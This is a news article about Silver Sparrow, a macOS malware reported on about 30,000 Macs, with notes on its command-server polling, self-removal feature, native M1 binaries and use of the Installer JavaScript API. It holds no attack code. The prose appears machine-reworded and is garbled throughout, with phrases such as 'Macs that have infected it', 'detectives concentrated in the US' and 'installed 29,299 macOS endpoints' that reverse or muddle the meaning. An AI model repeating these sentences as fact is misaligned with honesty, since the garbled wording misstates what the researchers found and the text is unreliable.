A previously unnoticed piece of malware found on nearly 30,000 Macs worldwide is causing intrigue in security circles, who are still trying to understand exactly what it does and what the purpose of the ability to destroy it itself is.
Once an hour, infected Macs go to a management service to see if there are any new commands that the malware needs to execute or binaries to execute. So far, however, researchers have not seen any delivery on any of the infected 30,000 machines, leaving the ultimate goal of the malware unknown. The lack of a final payload indicates that the malware can take effect as soon as an unknown condition is met.
The malware is also curious with a mechanism to completely remove itself, a capability typically reserved for high-stealth operations. So far, however, there are no signs that the self-destruction function has been used, which raises the question of why the mechanism exists.
Aside from these questions, the malware is notable for a version originally used on the M1 chip that Apple released in November, making it only the second known piece of macOS malware to do so. The malicious binary is even more mysterious because it uses the macOS Installer JavaScript API to execute commands. This makes it difficult to analyze the contents of the installation package or the way the JavaScript commands are used.
The malware was found in 153 countries with detectives concentrated in the US, UK, Canada, France and Germany. The use of Amazon Web Services and the Akamai content delivery network ensures that the command infrastructure works reliably and also complicates the blocking of the servers. Researchers at Red Canary, the security firm that discovered the malware, call the malware Silver Sparrow.
Fairly serious threat
“Although we have not yet observed Silver Sparrow delivering additional malicious loads, the forward-looking M1 chip compatibility, global reach, relatively high infection rate and operational maturity indicate that Silver Sparrow is a fairly serious threat that is uniquely positioned. to deliver a potential impact payload on instant notification, ‘Red Canary researchers wrote in a blog post published Friday. “Given these causes of concern, in the spirit of transparency, we wanted to share everything we know sooner rather than later with the broader infosec industry.”
Silver Sparrow comes in two versions – one with a binary in mach object format compiled for Intel x86_64 processors and the other Mach-O binary for the M1. The image below provides a high overview of the two versions:
Red Canary
So far, researchers have not seen any binary do anything, which has led researchers to call them “bystander binaries”. Oddly enough, when executed, the x86_64 binary displays the words “Hello World!” while the M1 binary reads: “You did it!” The researchers suspect that the files are placeholders to give the installer something to distribute content outside of the JavaScript implementation.
Silver Sparrow is only the second piece of malware that contains code available on Apple’s new M1 chip. An example of adware reported earlier this week was the first. Native M1 code runs faster and more reliably on the new platform than x86_64 code does, because the former does not need to be translated before being executed. Many developers of legitimate MacOS applications have not yet completed the process of recovering their code for the M1. Silver Sparrow’s M1 version indicates that the developers are ahead of the curve.
Once installed, Silver Sparrow searches for the URL from which the installation package was downloaded, most likely so that the malware operators will know which distribution channels are the most successful. In this regard, Silver Sparrow looks like MacOS adware seen before. It remains unclear exactly how or where the malware is distributed or how it is installed. However, the URL check indicates that malicious search results may be at least one distribution channel, in which case the installers are likely to present themselves as legitimate programs.
One of the most impressive things about Silver Sparrow is the number of Macs that have infected it. Red Canary researchers worked with their counterparts at Malwarebytes, while the latter group found that Silver Sparrow installed 29,299 macOS endpoints as of Wednesday. This is an important achievement.
‘For me the most important [thing] ‘s that it’s found on almost 30K macOS endpoints … and it’s only endpoints that MalwareBytes can see, so the number is probably much higher, ‘wrote Patrick Wardle, a MacOS security expert, in an internet message. “It’s pretty widespread … and once again, MacOS malware is becoming more expensive and more common, despite Apple’s best efforts.”
For those who want to see if their Mac is infected, Red Canary gives directions at the end of its report.